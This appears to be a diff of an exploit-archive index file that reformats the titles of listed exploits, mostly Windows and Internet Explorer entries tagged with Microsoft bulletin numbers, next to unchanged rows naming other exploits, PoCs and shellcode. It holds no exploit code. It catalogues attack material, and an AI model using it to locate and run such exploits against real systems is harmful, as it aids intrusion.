 18640,platforms/windows/remote/18640.txt,"Google Talk gtalk:// Deprecated Uri Handler Parameter Injection Vulnerability",2012-03-22,rgod,windows,remote,0
 18641,platforms/windows/dos/18641.txt,"Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT ActiveX Control PlayerPT.ocx sprintf Buffer Overflow Vulnerability",2012-03-22,rgod,windows,dos,0
-18642,platforms/windows/remote/18642.rb,"MS10-002 Internet Explorer Object Memory Use-After-Free",2012-03-22,metasploit,windows,remote,0
+18642,platforms/windows/remote/18642.rb,"Internet Explorer - Object Memory Use-After-Free (MS10-002)",2012-03-22,metasploit,windows,remote,0
 18643,platforms/windows/dos/18643.py,"Ricoh DC Software DL-10 FTP Server (SR10.exe) <= 1.1.0.6 - Remote Buffer Overflow Vulnerability",2012-03-22,"Julien Ahrens",windows,dos,0
 18644,platforms/php/webapps/18644.txt,"vBShout Persistent XSS",2012-03-22,ToiL,php,webapps,0
 18646,platforms/hardware/webapps/18646.txt,"Cyberoam UTM Multiiple Vulnerabilities",2012-03-22,"Saurabh Harit",hardware,webapps,0
@@ -16189,7 +16188,7 @@ id,file,description,date,author,platform,type,port
 18752,platforms/php/webapps/18752.txt,"newscoop 3.5.3 - Multiple Vulnerabilities",2012-04-19,"High-Tech Bridge SA",php,webapps,0
 18753,platforms/php/webapps/18753.txt,"XOOPS 2.5.4 - Multiple XSS Vulnerabilities",2012-04-19,"High-Tech Bridge SA",php,webapps,0
 18754,platforms/multiple/dos/18754.php,"LibreOffice 3.5.2.2 Memory Corruption",2012-04-19,shinnai,multiple,dos,0
-18755,platforms/windows/dos/18755.c,"MS11-046 Afd.sys Proof of Concept",2012-04-19,fb1h2s,windows,dos,0
+18755,platforms/windows/dos/18755.c,"Windows - Afd.sys Proof of Concept (MS11-046)",2012-04-19,fb1h2s,windows,dos,0
 18756,platforms/multiple/dos/18756.txt,"OpenSSL ASN1 BIO Memory Corruption Vulnerability",2012-04-19,"Tavis Ormandy",multiple,dos,0
 18757,platforms/windows/dos/18757.txt,"VLC 2.0.1 (.mp4) - Crash PoC",2012-04-19,"Senator of Pirates",windows,dos,0
 18758,platforms/multiple/dos/18758.txt,"Wireshark 'call_dissector()' NULL Pointer Dereference Denial of Service",2012-04-19,Wireshark,multiple,dos,0
@@ -16211,7 +16210,7 @@ id,file,description,date,author,platform,type,port
 18777,platforms/windows/dos/18777.txt,".NET Framework EncoderParameter Integer Overflow Vulnerability",2012-04-24,"Akita Software Security",windows,dos,0
 18778,platforms/php/webapps/18778.txt,"PHP Ticket System Beta 1 (index.php p parameter) SQL Injection",2012-04-24,G13,php,webapps,0
 18779,platforms/hardware/remote/18779.txt,"RuggedCom Devices Backdoor Access",2012-04-24,jc,hardware,remote,0
-18780,platforms/windows/remote/18780.rb,"MS12-027 MSCOMCTL ActiveX Buffer Overflow",2012-04-25,metasploit,windows,remote,0
+18780,platforms/windows/remote/18780.rb,"WIndows - MSCOMCTL ActiveX Buffer Overflow (MS12-027)",2012-04-25,metasploit,windows,remote,0
 18781,platforms/windows/local/18781.rb,"Shadow Stream Recorder 3.0.1.7 - Buffer Overflow",2012-04-25,metasploit,windows,local,0
 18782,platforms/php/webapps/18782.txt,"piwigo 2.3.3 - Multiple Vulnerabilities",2012-04-25,"High-Tech Bridge SA",php,webapps,0
 18783,platforms/linux/local/18783.txt,"mount.cifs chdir() Arbitrary root File Identification",2012-04-25,Sha0,linux,local,0
@@ -16411,7 +16410,7 @@ id,file,description,date,author,platform,type,port
 19034,platforms/windows/dos/19034.cpp,"PEamp (.mp3) Memory Corruption PoC",2012-06-10,Ayrbyte,windows,dos,0
 19035,platforms/php/webapps/19035.txt,"freepost 0.1 r1 - Multiple Vulnerabilities",2012-06-10,"ThE g0bL!N",php,webapps,0
 19036,platforms/php/webapps/19036.php,"Wordpress Content Flow 3D Plugin 1.0.0 - Arbitrary File Upload",2012-06-10,g11tch,php,webapps,0
-19037,platforms/windows/local/19037.rb,"MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability",2012-06-11,metasploit,windows,local,0
+19037,platforms/windows/local/19037.rb,"Microsoft Office - ClickOnce Unsafe Object Package Handling Vulnerability (MS12-005)",2012-06-11,metasploit,windows,local,0
 19038,platforms/php/webapps/19038.rb,"Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability",2012-06-10,metasploit,php,webapps,0
 19039,platforms/bsd/remote/19039,"BSD 4.2 fingerd buffer overflow Vulnerability",1988-10-01,anonymous,bsd,remote,0
 19040,platforms/solaris/remote/19040,"SunView (SunOS <= 4.1.1) selection_svc Vulnerability",1990-08-14,"Peter Shipley",solaris,remote,0
@@ -16504,7 +16503,7 @@ id,file,description,date,author,platform,type,port
 19137,platforms/hardware/dos/19137.rb,"Wyse Machine Remote Power off (DOS) without any privilege",2012-06-14,it.solunium,hardware,dos,0
 19138,platforms/windows/local/19138.txt,"ESRI ArcGIS 10.0.x / ArcMap 9 - Arbitrary Code Execution",2012-06-14,"Boston Cyber Defense",windows,local,0
 19139,platforms/multiple/local/19139.py,"Adobe Illustrator CS5.5 Memory Corruption Exploit",2012-06-14,"Felipe Andres Manzano",multiple,local,0
-19141,platforms/windows/remote/19141.rb,"MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption",2012-06-14,metasploit,windows,remote,0
+19141,platforms/windows/remote/19141.rb,"Internet Explorer - Same ID Property Deleted Object Handling Memory Corruption (MS12-037)",2012-06-14,metasploit,windows,remote,0
 19142,platforms/linux/local/19142.sh,"Oracle 8 File Access Vulnerabilities",1999-05-06,"Kevin Wenchel",linux,local,0
 19143,platforms/windows/local/19143.c,"Microsoft Windows ""April Fools 2001"" Vulnerability",1999-01-07,"Richard M. Smith",windows,local,0
 19144,platforms/windows/local/19144,"Microsoft Zero Administration Kit (ZAK) 1.0 and Office97 Backdoor Vulnerability",1999-01-07,"Satu Laksela",windows,local,0
@@ -17099,7 +17098,7 @@ id,file,description,date,author,platform,type,port
 19774,platforms/hardware/webapps/19774.txt,"TP Link Gateway 3.12.4 - Multiple Vulnerabilities",2012-07-12,Vulnerability-Lab,hardware,webapps,0
 19775,platforms/php/webapps/19775.txt,"Reserve Logic 1.2 - Booking CMS Multiple Vulnerabilities",2012-07-12,Vulnerability-Lab,php,webapps,0
 19776,platforms/windows/local/19776.pl,"ZipItFast PRO 3.0 - Heap Overflow Exploit",2012-07-12,b33f,windows,local,0
-19777,platforms/windows/dos/19777.txt,"IE9, SharePoint, Lync toStaticHTML HTML Sanitizing Bypass",2012-07-12,"Adi Cohen",windows,dos,0
+19777,platforms/windows/dos/19777.txt,"IE 9, SharePoint, Lync toStaticHTML HTML Sanitizing Bypass",2012-07-12,"Adi Cohen",windows,dos,0
 19778,platforms/linux/local/19778.c,"RedHat 4.x/5.x/6.x,RedHat man 1.5,Turbolinux man 1.5,Turbolinux 3.5/4.x man Buffer Overrun (1)",2000-02-26,"Babcia Padlina",linux,local,0
 19779,platforms/linux/local/19779.c,"RedHat 4.x/5.x/6.x,RedHat man 1.5,Turbolinux man 1.5,Turbolinux 3.5/4.x man Buffer Overrun (2)",2000-02-26,"Babcia Padlina",linux,local,0
 19780,platforms/multiple/remote/19780.txt,"Trend Micro OfficeScan Corporate Edition 3.0/3.5/3.11/3.13 DoS Vulnerabilities",2000-02-26,"Jeff Stevens",multiple,remote,0
@@ -17834,7 +17833,7 @@ id,file,description,date,author,platform,type,port
 20544,platforms/php/webapps/20544.txt,"xt:Commerce <= 3.04 SP2.1 - Time Based Blind SQL Injection",2012-08-15,stoffline.com,php,webapps,0
 20545,platforms/windows/webapps/20545.txt,"Cyclope Employee Surveillance Solution 6.0 6.1.0 6.2.0 - Multiple Vulnerabilities",2012-08-15,loneferret,windows,webapps,0
 20546,platforms/php/webapps/20546.txt,"sphpforum 0.4 - Multiple Vulnerabilities",2012-08-15,loneferret,php,webapps,0
-20547,platforms/windows/remote/20547.txt,"IE Time Element Memory Corruption Exploit (MS11-050)",2012-08-16,Ciph3r,windows,remote,0
+20547,platforms/windows/remote/20547.txt,"Internet Explorer Time Element Memory Corruption Exploit (MS11-050)",2012-08-16,Ciph3r,windows,remote,0
 20549,platforms/php/webapps/20549.py,"Roundcube Webmail 0.8.0 - Stored XSS",2012-08-16,"Shai rod",php,webapps,0
 20550,platforms/php/webapps/20550.txt,"ProQuiz 2.0.2 - CSRF Vulnerability",2012-08-16,DaOne,php,webapps,0
 20551,platforms/linux/remote/20551.pl,"E-Mail Security Virtual Appliance (ESVA) Remote Execution",2012-08-16,iJoo,linux,remote,0
@@ -19077,11 +19076,11 @@ id,file,description,date,author,platform,type,port
 21837,platforms/windows/remote/21837.rb,"InduSoft Web Studio Arbitrary Upload Remote Code Execution",2012-10-10,metasploit,windows,remote,4322
 21838,platforms/windows/remote/21838.rb,"Avaya WinPMD UniteHostRouter Buffer Overflow",2012-10-10,metasploit,windows,remote,3217
 21839,platforms/windows/remote/21839.rb,"NTR ActiveX Control StopModule() Remote Code Execution",2012-10-10,metasploit,windows,remote,0
-21840,platforms/windows/remote/21840.rb,"MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability",2012-10-10,metasploit,windows,remote,0
+21840,platforms/windows/remote/21840.rb,"Microsoft Internet Explorer - execCommand Use-After-Free Vulnerability (MS12-063)",2012-10-10,metasploit,windows,remote,0
 21841,platforms/windows/remote/21841.rb,"NTR ActiveX Control Check() Method Buffer Overflow",2012-10-10,metasploit,windows,remote,0
 21842,platforms/windows/remote/21842.rb,"HP Application Lifecycle Management XGO.ocx ActiveX SetShapeNodeType() Remote Code Execution",2012-10-10,metasploit,windows,remote,0
 21843,platforms/windows/local/21843.rb,"Windows Escalate UAC Execute RunAs",2012-10-10,metasploit,windows,local,0
-21844,platforms/windows/local/21844.rb,"MS11-080 AfdJoinLeaf Privilege Escalation",2012-10-10,metasploit,windows,local,0
+21844,platforms/windows/local/21844.rb,"Windows - AfdJoinLeaf Privilege Escalation (MS11-080)",2012-10-10,metasploit,windows,local,0
 21845,platforms/windows/local/21845.rb,"Windows Escalate UAC Protection Bypass",2012-10-10,metasploit,windows,local,0
 21846,platforms/java/remote/21846.rb,"Oracle Business Transaction Management FlashTunnelService Remote Code Execution",2012-10-10,metasploit,java,remote,7001
 21847,platforms/windows/remote/21847.rb,"Avaya IP Office Customer Call Reporter ImageUpload.ashx Remote Command Execution",2012-10-10,metasploit,windows,remote,0
@@ -21631,7 +21630,7 @@ id,file,description,date,author,platform,type,port
 24481,platforms/php/webapps/24481.txt,"IP.Gallery 4.2.x and 5.0.x Persistent XSS Vulnerability",2013-02-11,"Mohamed Ramadan",php,webapps,0
 24483,platforms/hardware/webapps/24483.txt,"TP-LINK Admin Panel Multiple CSRF Vulnerabilities",2013-02-11,"CYBSEC Labs",hardware,webapps,0
 24484,platforms/hardware/webapps/24484.txt,"Air Disk Wireless 1.9 iPad iPhone - Multiple Vulnerabilities",2013-02-11,Vulnerability-Lab,hardware,webapps,0
-24485,platforms/windows/dos/24485.txt,"MS13-005 HWND_BROADCAST PoC",2013-02-11,0vercl0k,windows,dos,0
+24485,platforms/windows/dos/24485.txt,"Windows - HWND_BROADCAST PoC (MS13-005)",2013-02-11,0vercl0k,windows,dos,0
 24486,platforms/multiple/dos/24486.txt,"Google Chrome Silent HTTP Authentication",2013-02-11,T355,multiple,dos,0
 24487,platforms/linux/dos/24487.py,"cURL Buffer Overflow Vulnerability",2013-02-11,Volema,linux,dos,0
 24490,platforms/windows/remote/24490.rb,"Novell GroupWise Client gwcls1.dll ActiveX Remote Code Execution",2013-02-12,metasploit,windows,remote,0
@@ -21673,7 +21672,7 @@ id,file,description,date,author,platform,type,port
 24535,platforms/windows/webapps/24535.txt,"Alt-N MDaemon WorldClient 13.0.3 - Multiple Vulnerabilities",2013-02-21,"QSecure and Demetris Papapetrou",windows,webapps,0
 24536,platforms/php/webapps/24536.txt,"glFusion 1.2.2 - Multiple XSS Vulnerabilities",2013-02-21,"High-Tech Bridge SA",php,webapps,0
 24537,platforms/php/webapps/24537.txt,"phpMyRecipes 1.2.2 (viewrecipe.php, r_id param) - SQL Injection Vulnerability",2013-02-21,"cr4wl3r ",php,webapps,0
-24538,platforms/windows/remote/24538.rb,"MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free",2013-02-23,metasploit,windows,remote,0
+24538,platforms/windows/remote/24538.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009)",2013-02-23,metasploit,windows,remote,0
 24539,platforms/multiple/remote/24539.rb,"Java Applet JMX Remote Code Execution",2013-02-25,metasploit,multiple,remote,0
 24540,platforms/php/webapps/24540.pl,"Brewthology 0.1 - SQL Injection Exploit",2013-02-26,"cr4wl3r ",php,webapps,0
 24542,platforms/php/webapps/24542.txt,"Rix4Web Portal - Blind SQL Injection Vulnerability",2013-02-26,L0n3ly-H34rT,php,webapps,0
@@ -23256,7 +23255,7 @@ id,file,description,date,author,platform,type,port
 26172,platforms/php/webapps/26172.txt,"Mantis 0.x/1.0 - Multiple Input Validation Vulnerabilities",2005-08-19,anonymous,php,webapps,0
 26173,platforms/windows/dos/26173.txt,"AXIS Media Control 6.2.10.11 - Unsafe ActiveX Method",2013-06-13,"Javier Repiso Sánchez",windows,dos,0
 26174,platforms/hardware/webapps/26174.txt,"Airlive IP Cameras - Multiple Vulnerabilities",2013-06-13,"Sánchez, Lopez, Castillo",hardware,webapps,0
-26175,platforms/windows/remote/26175.rb,"MS13-009 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow",2013-06-13,metasploit,windows,remote,0
+26175,platforms/windows/remote/26175.rb,"Microsoft Internet Explorer - COALineDashStyleArray Integer Overflow (MS13-009)",2013-06-13,metasploit,windows,remote,0
 26176,platforms/php/webapps/26176.txt,"Woltlab Burning Board 2.x ModCP.PHP SQL Injection Vulnerability",2005-08-20,[R],php,webapps,0
 26177,platforms/php/webapps/26177.txt,"Land Down Under 800/801 links.php w Parameter SQL Injection",2005-08-20,bl2k,php,webapps,0
 26178,platforms/php/webapps/26178.txt,"Land Down Under 800/801 journal.php m Parameter SQL Injection",2005-08-20,bl2k,php,webapps,0
@@ -25103,7 +25102,7 @@ id,file,description,date,author,platform,type,port
 28079,platforms/windows/dos/28079.py,"jetAudio 8.0.16.2000 Plus VX - (.wav) - Crash PoC",2013-09-04,ariarat,windows,dos,0
 28080,platforms/windows/dos/28080.py,"GOMPlayer 2.2.53.5169 (.wav) - Crash PoC",2013-09-04,ariarat,windows,dos,0
 28081,platforms/ios/remote/28081.txt,"Apple Safari 6.0.1 for iOS 6.0 and OS X 10.7/8 - Heap Buffer Overflow",2013-09-04,"Vitaliy Toropov",ios,remote,0
-28082,platforms/windows/remote/28082.rb,"MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free",2013-09-04,metasploit,windows,remote,0
+28082,platforms/windows/remote/28082.rb,"Microsoft Internet Explorer - CFlatMarkupPointer Use-After-Free (MS13-059)",2013-09-04,metasploit,windows,remote,0
 28083,platforms/windows/remote/28083.rb,"HP LoadRunner lrFileIOService ActiveX WriteFileString Remote Code Execution",2013-09-04,metasploit,windows,remote,0
 28084,platforms/windows/local/28084.html,"KingView 6.53 - Insecure ActiveX Control (SuperGrid)",2013-09-04,blake,windows,local,0
 28085,platforms/windows/local/28085.html,"KingView 6.53 - ActiveX Remote File Creation / Overwrite (KChartXY)",2013-09-04,blake,windows,local,0
@@ -25205,7 +25204,7 @@ id,file,description,date,author,platform,type,port
 28184,platforms/hardware/webapps/28184.txt,"D-Link DIR-505 1.06 - Multiple Vulnerabilities",2013-09-10,"Alessandro Di Pinto",hardware,webapps,0
 28185,platforms/php/webapps/28185.txt,"glFusion 1.3.0 (search.php, cat_id param) - SQL Injection",2013-09-10,"Omar Kurt",php,webapps,0
 28186,platforms/windows/remote/28186.c,"Kaillera 0.86 Message Buffer Overflow Vulnerability",2006-07-06,"Luigi Auriemma",windows,remote,0
-28187,platforms/windows/remote/28187.rb,"MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free",2013-09-10,metasploit,windows,remote,0
+28187,platforms/windows/remote/28187.rb,"Microsoft Internet Explorer CAnchorElement Use-After-Free (MS13-055)",2013-09-10,metasploit,windows,remote,0
 28188,platforms/windows/remote/28188.rb,"HP SiteScope Remote Code Execution",2013-09-10,metasploit,windows,remote,8080
 28189,platforms/windows/remote/28189.txt,"Microsoft Excel 2000-2004 Style Handling and Repair Remote Code Execution Vulnerability",2006-07-06,Nanika,windows,remote,0
 28190,platforms/php/webapps/28190.txt,"ExtCalendar 2.0 ExtCalendar.php Remote File Include Vulnerability",2006-07-07,Matdhule,php,webapps,0
@@ -25256,7 +25255,7 @@ id,file,description,date,author,platform,type,port
 28235,platforms/windows/remote/28235.c,"RARLAB WinRAR 3.x LHA Filename Handling Buffer Overflow Vulnerability",2006-07-18,"Ryan Smith",windows,remote,0
 28236,platforms/ios/webapps/28236.txt,"Talkie Bluetooth Video iFiles 2.0 iOS - Multiple Vulnerabilities",2013-09-12,Vulnerability-Lab,ios,webapps,0
 28237,platforms/windows/dos/28237.py,"Target Longlife Media Player 2.0.2.0 (.wav) - Crash PoC",2013-09-12,gunslinger_,windows,dos,0
-28238,platforms/windows/webapps/28238.txt,"Microsoft SharePoint 2013 (Cloud) - Persistent Exception Handling Vulnerability MS13-067",2013-09-12,Vulnerability-Lab,windows,webapps,0
+28238,platforms/windows/webapps/28238.txt,"Microsoft SharePoint 2013 (Cloud) - Persistent Exception Handling Vulnerability (MS13-067)",2013-09-12,Vulnerability-Lab,windows,webapps,0
 28239,platforms/hardware/webapps/28239.txt,"D-Link DSL-2740B - Multiple CSRF Vulnerabilities",2013-09-12,"Ivano Binetti",hardware,webapps,0
 28243,platforms/linux/webapps/28243.txt,"Synology DiskStation Manager (DSM) 4.3-3776 - Multiple Vulnerabilities",2013-09-12,"Andrea Fabrizi",linux,webapps,0
 28244,platforms/windows/dos/28244.txt,"Microsoft Internet Explorer 6.0 DataSourceControl Denial of Service Vulnerability",2006-07-19,hdm,windows,dos,0
@@ -25486,8 +25485,8 @@ id,file,description,date,author,platform,type,port
 28473,platforms/php/webapps/28473.txt,"Autentificator 2.01 Aut_Verifica.Inc.PHP SQL Injection Vulnerability",2006-09-02,SirDarckCat,php,webapps,0
 28474,platforms/lin_x86/shellcode/28474.c,"Linux/x86 Multi-Egghunter",2013-09-23,"Ryan Fenno",lin_x86,shellcode,0
 28480,platforms/windows/remote/28480.rb,"CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow",2013-09-23,metasploit,windows,remote,6502
-28481,platforms/windows/remote/28481.rb,"MS13-069 Microsoft Internet Explorer CCaret Use-After-Free",2013-09-23,metasploit,windows,remote,0
-28482,platforms/windows/remote/28482.rb,"MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution",2013-09-23,metasploit,windows,remote,0
+28481,platforms/windows/remote/28481.rb,"Microsoft Internet Explorer - CCaret Use-After-Free (MS13-069)",2013-09-23,metasploit,windows,remote,0
+28482,platforms/windows/remote/28482.rb,"Microsoft Windows Theme File Handling - Arbitrary Code Execution (MS13-071)",2013-09-23,metasploit,windows,remote,0
 28483,platforms/php/remote/28483.rb,"GLPI install.php Remote Command Execution",2013-09-23,metasploit,php,remote,80
 28484,platforms/hardware/remote/28484.rb,"Linksys WRT110 Remote Command Execution",2013-09-23,metasploit,hardware,remote,0
 28485,platforms/php/webapps/28485.txt,"Wordpress NOSpamPTI Plugin - Blind SQL Injection",2013-09-23,"Alexandro Silva",php,webapps,0
@@ -25964,7 +25963,7 @@ id,file,description,date,author,platform,type,port
 28971,platforms/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 (exportcsv.php, sondage param) - SQL Injection",2013-10-15,drone,php,webapps,80
 28972,platforms/unix/webapps/28972.rb,"Zabbix 2.0.8 - SQL Injection and Remote Code Execution",2013-10-15,"Jason Kratzer",unix,webapps,0
 28973,platforms/windows/remote/28973.rb,"HP Data Protector Cell Request Service Buffer Overflow",2013-10-15,metasploit,windows,remote,0
-28974,platforms/windows/remote/28974.rb,"MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free",2013-10-15,metasploit,windows,remote,0
+28974,platforms/windows/remote/28974.rb,"Microsoft Internet Explorer - CDisplayPointer Use-After-Free (MS13-080)",2013-10-15,metasploit,windows,remote,0
 28975,platforms/ios/webapps/28975.txt,"My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,ios,webapps,0
 28976,platforms/ios/webapps/28976.txt,"OliveOffice Mobile Suite 2.0.3 iOS - File Include Vulnerability",2013-10-15,Vulnerability-Lab,ios,webapps,0
 28977,platforms/ios/webapps/28977.txt,"UbiDisk File Manager 2.0 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,ios,webapps,0
@@ -26783,8 +26782,8 @@ id,file,description,date,author,platform,type,port
 29853,platforms/windows/remote/29853.rb,"LanDesk Management Suite 8.7 Alert Service AOLSRVR.EXE Buffer Overflow Vulnerability",2007-04-13,"Aaron Portnoy",windows,remote,0
 29854,platforms/php/webapps/29854.txt,"BloofoxCMS 0.2.2 Img_Popup.PHP Cross-Site Scripting Vulnerability",2007-04-14,the_Edit0r,php,webapps,0
 29855,platforms/php/webapps/29855.txt,"Flowers Cas.PHP Cross-Site Scripting Vulnerability",2007-04-14,the_Edit0r,php,webapps,0
-29857,platforms/windows/remote/29857.rb,"MS13-090 CardSpaceClaimCollection ActiveX Integer Underflow",2013-11-27,metasploit,windows,remote,0
-29858,platforms/windows/remote/29858.rb,"MS12-022 Microsoft Internet Explorer COALineDashStyleArray Unsafe Memory Access",2013-11-27,metasploit,windows,remote,0
+29857,platforms/windows/remote/29857.rb,"Internet Explorer - CardSpaceClaimCollection ActiveX Integer Underflow (MS13-090)",2013-11-27,metasploit,windows,remote,0
+29858,platforms/windows/remote/29858.rb,"Microsoft Internet Explorer - COALineDashStyleArray Unsafe Memory Access (MS12-022)",2013-11-27,metasploit,windows,remote,0
 29859,platforms/java/remote/29859.rb,"Apache Roller OGNL Injection",2013-11-27,metasploit,java,remote,8080
 29860,platforms/windows/dos/29860.c,"ZoneAlarm 6.1.744.001/6.5.737.000 Vsdatant.SYS Driver Local Denial of Service Vulnerability",2007-04-15,"Matousec Transparent security",windows,dos,0
 29861,platforms/php/webapps/29861.txt,"Palo Alto Networks Pan-OS 5.0.8 - Multiple Vulnerabilities",2013-11-27,"Thomas Pollet",php,webapps,0
@@ -29181,7 +29180,7 @@ id,file,description,date,author,platform,type,port
 32434,platforms/php/webapps/32434.txt,"Recipe Script 'search.php' Cross Site Scripting Vulnerability",2008-09-27,"Ghost Hacker",php,webapps,0
 32435,platforms/windows/dos/32435.c,"Immunity Debugger 1.85 - Stack Overflow Vulnerabil?ity (PoC)",2014-03-22,"Veysel HATAS",windows,dos,0
 32437,platforms/php/webapps/32437.txt,"LifeSize UVC 1.2.6 - Authenticated RCE Vulnerabilities",2014-03-22,"Brandon Perry",php,webapps,0
-32438,platforms/windows/remote/32438.rb,"MS14-012 Internet Explorer TextRange Use-After-Free",2014-03-22,metasploit,windows,remote,0
+32438,platforms/windows/remote/32438.rb,"Internet Explorer - TextRange Use-After-Free (MS14-012)",2014-03-22,metasploit,windows,remote,0
 32439,platforms/php/remote/32439.rb,"Horde Framework Unserialize PHP Code Execution",2014-03-22,metasploit,php,remote,80
 32440,platforms/hardware/remote/32440.rb,"Array Networks vAPV and vxAG Private Key Privelege Escalation Code Execution",2014-03-22,metasploit,hardware,remote,22
 32441,platforms/php/webapps/32441.txt,"PHPJabbers Post Comments 3.0 Cookie Authentication Bypass Vulnerability",2008-09-29,Crackers_Child,php,webapps,0
@@ -29523,7 +29522,7 @@ id,file,description,date,author,platform,type,port
 32790,platforms/php/webapps/32790.txt,"XCloner Standalone 3.5 - CSRF Vulnerability",2014-04-10,"High-Tech Bridge SA",php,webapps,80
 32791,platforms/multiple/remote/32791.c,"Heartbleed OpenSSL - Information Leak Exploit (1)",2014-04-10,prdelka,multiple,remote,443
 32792,platforms/php/webapps/32792.txt,"Orbit Open Ad Server 1.1.0 - SQL Injection",2014-04-10,"High-Tech Bridge SA",php,webapps,80
-32793,platforms/windows/local/32793.rb,"MS14-017 Microsoft Word RTF Object Confusion",2014-04-10,metasploit,windows,local,0
+32793,platforms/windows/local/32793.rb,"Microsoft Word - RTF Object Confusion (MS14-017)",2014-04-10,metasploit,windows,local,0
 32794,platforms/php/remote/32794.rb,"Vtiger Install Unauthenticated Remote Command Execution",2014-04-10,metasploit,php,remote,80
 32795,platforms/novell/remote/32795.txt,"Novell QuickFinder Server Multiple Cross-Site Scripting Vulnerabilities",2009-02-09,"Ivan Sanchez",novell,remote,0
 32796,platforms/linux/remote/32796.txt,"Swann DVR4 SecuraNet Directory Traversal Vulnerability",2009-02-10,"Terry Froy",linux,remote,0
@@ -29579,7 +29578,7 @@ id,file,description,date,author,platform,type,port
 32848,platforms/linux/local/32848.txt,"Sun xVM VirtualBox 2.0/2.1 Local Privilege Escalation Vulnerability",2009-03-10,"Sun Microsystems",linux,local,0
 32849,platforms/linux/dos/32849.txt,"PostgreSQL <= 8.3.6 Conversion Encoding Remote Denial of Service Vulnerability",2009-03-11,"Afonin Denis",linux,dos,0
 32850,platforms/windows/local/32850.txt,"Multiple SlySoft Products - Driver IOCTL Request Multiple Local Buffer Overflow Vulnerabilities",2009-03-12,"Nikita Tarakanov",windows,local,0
-32851,platforms/windows/remote/32851.html,"MS14-012 Internet Explorer CMarkup Use-After-Free",2014-04-14,"Jean-Jamil Khalife",windows,remote,0
+32851,platforms/windows/remote/32851.html,"Internet Explorer - CMarkup Use-After-Free (MS14-012)",2014-04-14,"Jean-Jamil Khalife",windows,remote,0
 32852,platforms/php/webapps/32852.txt,"TikiWiki 2.2/3.0 'tiki-galleries.php' Cross Site Scripting Vulnerability",2009-03-12,iliz,php,webapps,0
 32853,platforms/php/webapps/32853.txt,"TikiWiki 2.2/3.0 'tiki-list_file_gallery.php' Cross Site Scripting Vulnerability",2009-03-12,iliz,php,webapps,0
 32854,platforms/php/webapps/32854.txt,"TikiWiki 2.2/3.0 'tiki-listpages.php' Cross Site Scripting Vulnerability",2009-03-12,iliz,php,webapps,0
@@ -29630,7 +29629,7 @@ id,file,description,date,author,platform,type,port
 32901,platforms/php/local/32901.php,"PHP 5.2.9 cURL 'safe_mode' and 'open_basedir' Restriction-Bypass Vulnerability",2009-04-10,"Maksymilian Arciemowicz",php,local,0
 32902,platforms/windows/dos/32902.py,"Microsoft Internet Explorer 8 File Download Denial of Service Vulnerability",2009-04-11,"Nam Nguyen",windows,dos,0
 32903,platforms/asp/webapps/32903.txt,"People-Trak Login SQL Injection Vulnerability",2009-04-13,Mormoroth.net,asp,webapps,0
-32904,platforms/windows/remote/32904.rb,"MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free",2014-04-16,metasploit,windows,remote,0
+32904,platforms/windows/remote/32904.rb,"Microsoft Internet Explorer - CMarkup Use-After-Free (MS14-012)",2014-04-16,metasploit,windows,remote,0
 32905,platforms/php/webapps/32905.txt,"LinPHA 1.3.2/1.3.3 login.php XSS",2009-04-09,"Gerendi Sandor Attila",php,webapps,0
 32906,platforms/php/webapps/32906.txt,"LinPHA 1.3.2/1.3.3 new_images.php XSS",2009-04-09,"Gerendi Sandor Attila",php,webapps,0
 32907,platforms/cgi/webapps/32907.txt,"Banshee 1.4.2 DAAP Extension 'apps/web/vs_diag.cgi' Cross Site Scripting Vulnerability",2009-04-13,"Anthony de Almeida Lopes",cgi,webapps,0
@@ -30499,7 +30498,7 @@ id,file,description,date,author,platform,type,port
 33856,platforms/php/webapps/33856.txt,"Viennabux Beta! 'cat' Parameter SQL Injection Vulnerability",2010-04-09,"Easy Laster",php,webapps,0
 33857,platforms/php/webapps/33857.txt,"e107 0.7.x 'e107_admin/banner.php' SQL Injection Vulnerability",2010-04-21,"High-Tech Bridge SA",php,webapps,0
 33858,platforms/php/webapps/33858.txt,"DBSite wb CMS 'index.php' Multiple Cross Site Scripting Vulnerabilities",2010-04-21,The_Exploited,php,webapps,0
-33860,platforms/windows/dos/33860.html,"Internet Explorer 8, 9 & 10 - CInput Use-After-Free (MS14-035) - Crash PoC",2014-06-24,"Drozdova Liudmila",windows,dos,0
+33860,platforms/windows/dos/33860.html,"Internet Explorer 8, 9 & 10 - CInput Use-After-Free Crash PoC (MS14-035)",2014-06-24,"Drozdova Liudmila",windows,dos,0
 33862,platforms/hardware/remote/33862.rb,"D-Link authentication.cgi Buffer Overflow",2014-06-24,metasploit,hardware,remote,80
 33863,platforms/hardware/remote/33863.rb,"D-Link hedwig.cgi Buffer Overflow in Cookie Header",2014-06-24,metasploit,hardware,remote,80
 33865,platforms/linux/remote/33865.rb,"AlienVault OSSIM av-centerd Command Injection",2014-06-24,metasploit,linux,remote,40007
@@ -30528,8 +30527,8 @@ id,file,description,date,author,platform,type,port
 33889,platforms/php/webapps/33889.txt,"SmartBlog 1.3 SQL Injection and Cross Site Scripting Vulnerabilities",2010-04-27,indoushka,php,webapps,0
 33890,platforms/windows/remote/33890.txt,"OneHTTPD 0.6 Directory Traversal Vulnerability",2010-04-27,"John Leitch",windows,remote,0
 33891,platforms/java/remote/33891.rb,"HP AutoPass License Server File Upload",2014-06-27,metasploit,java,remote,5814
-33892,platforms/windows/local/33892.rb,"MS14-009 .NET Deployment Service IE Sandbox Escape",2014-06-27,metasploit,windows,local,0
-33893,platforms/windows/local/33893.rb,"MS13-097 Registry Symlink IE Sandbox Escape",2014-06-27,metasploit,windows,local,0
